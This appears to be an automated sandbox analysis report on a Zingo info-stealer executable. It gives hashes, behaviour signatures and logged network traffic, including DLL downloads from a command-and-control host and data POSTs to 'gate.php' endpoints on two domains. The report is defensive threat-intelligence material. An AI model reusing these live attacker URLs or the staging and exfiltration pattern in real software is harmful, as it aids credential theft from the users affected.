Analysis

  • max time kernel
    90s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16-10-2022 15:09

General

  • Target

    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe

  • Size

    54KB

  • MD5

    b5282d498ca119c35cdbae2d0783dbfd

  • SHA1

    d2acb7d1c31e3035386194c09a56f7e22de162d6

  • SHA256

    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5

  • SHA512

    7ac7758bc08b0f2075a79196ab85df976fa36ed380b0b8f81739005d92a58a91e55ba845337ab08dcf78d05c31735dbb3835549a6c7416e9a523864ab594add3

  • SSDEEP

    768:VzoZgTk0MRUQDbDySGol+1R/8LGRaUh1GM78EEcOwPsiX/z+h:JoZgTPsbDySGol+ELC1NAfG/g

Malware Config

Signatures

  • Zingo stealer

    Zingo is an info stealer first seen in March 2022.

  • Zingo stealer payload 1 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    "C:\Users\Admin\AppData\Local\Temp\9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious use of AdjustPrivilegeToken
    PID:3720

Network

  • flag-us
    DNS
    n21krwhz.beget.tech
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    8.8.8.8:53
    Request
    n21krwhz.beget.tech
    IN A
    Response
    n21krwhz.beget.tech
    IN A
    87.236.19.248
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL/DotNetZip.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL/DotNetZip.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:09 GMT
    Content-Type: application/x-msdownload
    Content-Length: 472064
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "73400-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL/System.Data.SQLite.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL/System.Data.SQLite.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:10 GMT
    Content-Type: application/x-msdownload
    Content-Length: 393520
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "60130-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL/Newtonsoft.Json.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL/Newtonsoft.Json.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:10 GMT
    Content-Type: application/x-msdownload
    Content-Length: 701992
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "ab628-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL/BouncyCastle.Crypto.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL/BouncyCastle.Crypto.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:11 GMT
    Content-Type: application/x-msdownload
    Content-Length: 2609152
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "27d000-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL//x86/SQLite.Interop.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL//x86/SQLite.Interop.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:13 GMT
    Content-Type: application/x-msdownload
    Content-Length: 1374512
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "14f930-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL//x64/SQLite.Interop.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL//x64/SQLite.Interop.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:14 GMT
    Content-Type: application/x-msdownload
    Content-Length: 1763632
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "1ae930-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    POST
    http://n21krwhz.beget.tech/gate.php
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    POST /gate.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------8daaf88ae3b3765
    Host: n21krwhz.beget.tech
    Content-Length: 1505678
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:23 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: keep-alive
    Keep-Alive: timeout=30
    X-Powered-By: PHP/7.4.25
  • flag-us
    DNS
    freegeoip.app
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    8.8.8.8:53
    Request
    freegeoip.app
    IN A
    Response
    freegeoip.app
    IN A
    188.114.96.0
    freegeoip.app
    IN A
    188.114.97.0
  • flag-us
    GET
    https://freegeoip.app/xml/
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    188.114.96.0:443
    Request
    GET /xml/ HTTP/1.1
    Host: freegeoip.app
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 16 Oct 2022 15:11:17 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 16 Oct 2022 16:11:17 GMT
    Location: https://ipbase.com/xml/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PwNJ8V%2BoM1jKjs66Y%2Bj8VrYMlkTQPd67WgKcM6ueaVU12bgus6oJ6Q8U3cY0IfpW8c3O%2FJ7ZiXHgvr9WAZmHsj8c73nm3gL2t4EXcOuT4Jj9lsNQR9u61La%2BqQq5Mq40"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 75b1b9e4bc981e85-AMS
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
  • flag-us
    DNS
    ipbase.com
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    8.8.8.8:53
    Request
    ipbase.com
    IN A
    Response
    ipbase.com
    IN A
    75.2.60.5
    ipbase.com
    IN A
    99.83.231.61
  • flag-us
    GET
    https://ipbase.com/xml/
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    75.2.60.5:443
    Request
    GET /xml/ HTTP/1.1
    Host: ipbase.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Age: 90147
    Cache-Control: public, max-age=0, must-revalidate
    Content-Length: 3082
    Content-Type: text/html; charset=utf-8
    Date: Sat, 15 Oct 2022 14:08:50 GMT
    Etag: 1649775430-ssl
    Server: Netlify
    Strict-Transport-Security: max-age=31536000
    X-Nf-Request-Id: 01GFGNJTTEB1VFDBZK9ZXBFD43
  • flag-us
    DNS
    f0671130.xsph.ru
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    8.8.8.8:53
    Request
    f0671130.xsph.ru
    IN A
    Response
    f0671130.xsph.ru
    IN A
    141.8.197.42
  • flag-ru
    POST
    http://f0671130.xsph.ru/gate.php
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    141.8.197.42:80
    Request
    POST /gate.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------8daaf88af9e7278
    Host: f0671130.xsph.ru
    Content-Length: 1505678
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Sun, 16 Oct 2022 15:11:24 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • 87.236.19.248:80
    http://n21krwhz.beget.tech/gate.php
    http
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    1.7MB
    7.6MB
    4016
    6289

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL/DotNetZip.dll

    HTTP Response

    200

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL/System.Data.SQLite.dll

    HTTP Response

    200

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL/Newtonsoft.Json.dll

    HTTP Response

    200

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL/BouncyCastle.Crypto.dll

    HTTP Response

    200

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL//x86/SQLite.Interop.dll

    HTTP Response

    200

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL//x64/SQLite.Interop.dll

    HTTP Response

    200

    HTTP Request

    POST http://n21krwhz.beget.tech/gate.php

    HTTP Response

    200
  • 188.114.96.0:443
    https://freegeoip.app/xml/
    tls, http
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    766 B
    3.8kB
    9
    8

    HTTP Request

    GET https://freegeoip.app/xml/

    HTTP Response

    301
  • 75.2.60.5:443
    https://ipbase.com/xml/
    tls, http
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    806 B
    8.2kB
    10
    12

    HTTP Request

    GET https://ipbase.com/xml/

    HTTP Response

    404
  • 141.8.197.42:80
    http://f0671130.xsph.ru/gate.php
    http
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    1.5MB
    16.1kB
    1085
    394

    HTTP Request

    POST http://f0671130.xsph.ru/gate.php

    HTTP Response

    400
  • 13.89.179.9:443
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 8.8.8.8:53
    n21krwhz.beget.tech
    dns
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    65 B
    81 B
    1
    1

    DNS Request

    n21krwhz.beget.tech

    DNS Response

    87.236.19.248

  • 8.8.8.8:53
    freegeoip.app
    dns
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    59 B
    91 B
    1
    1

    DNS Request

    freegeoip.app

    DNS Response

    188.114.96.0
    188.114.97.0

  • 8.8.8.8:53
    ipbase.com
    dns
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    56 B
    88 B
    1
    1

    DNS Request

    ipbase.com

    DNS Response

    75.2.60.5
    99.83.231.61

  • 8.8.8.8:53
    f0671130.xsph.ru
    dns
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    62 B
    78 B
    1
    1

    DNS Request

    f0671130.xsph.ru

    DNS Response

    141.8.197.42

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll

    Filesize

    461KB

    MD5

    a999d7f3807564cc816c16f862a60bbe

    SHA1

    1ee724daaf70c6b0083bf589674b6f6d8427544f

    SHA256

    8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

    SHA512

    6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

  • C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

    Filesize

    685KB

    MD5

    081d9558bbb7adce142da153b2d5577a

    SHA1

    7d0ad03fbda1c24f883116b940717e596073ae96

    SHA256

    b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

    SHA512

    2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

  • C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll

    Filesize

    384KB

    MD5

    55c797383dbbbfe93c0fe3215b99b8ec

    SHA1

    1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

    SHA256

    5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

    SHA512

    648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

  • C:\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dll

    Filesize

    1.3MB

    MD5

    8be215abf1f36aa3d23555a671e7e3be

    SHA1

    547d59580b7843f90aaca238012a8a0c886330e6

    SHA256

    83f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae

    SHA512

    38cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b

  • memory/3720-138-0x0000000005B30000-0x0000000005B80000-memory.dmp

    Filesize

    320KB

  • memory/3720-139-0x00000000057F0000-0x0000000005812000-memory.dmp

    Filesize

    136KB

  • memory/3720-132-0x0000000000370000-0x0000000000384000-memory.dmp

    Filesize

    80KB

  • memory/3720-137-0x0000000006CB0000-0x0000000006D60000-memory.dmp

    Filesize

    704KB

  • memory/3720-142-0x0000000006D60000-0x0000000006DC2000-memory.dmp

    Filesize

    392KB

  • memory/3720-143-0x0000000007300000-0x00000000074C2000-memory.dmp

    Filesize

    1.8MB

  • memory/3720-145-0x00000000077A0000-0x00000000077DC000-memory.dmp

    Filesize

    240KB

  • memory/3720-146-0x00000000085B0000-0x0000000008616000-memory.dmp

    Filesize

    408KB

  • memory/3720-134-0x0000000005BA0000-0x0000000006144000-memory.dmp

    Filesize

    5.6MB

  • memory/3720-133-0x0000000005550000-0x00000000055E2000-memory.dmp

    Filesize

    584KB

  • memory/3720-149-0x0000000008620000-0x000000000869A000-memory.dmp

    Filesize

    488KB
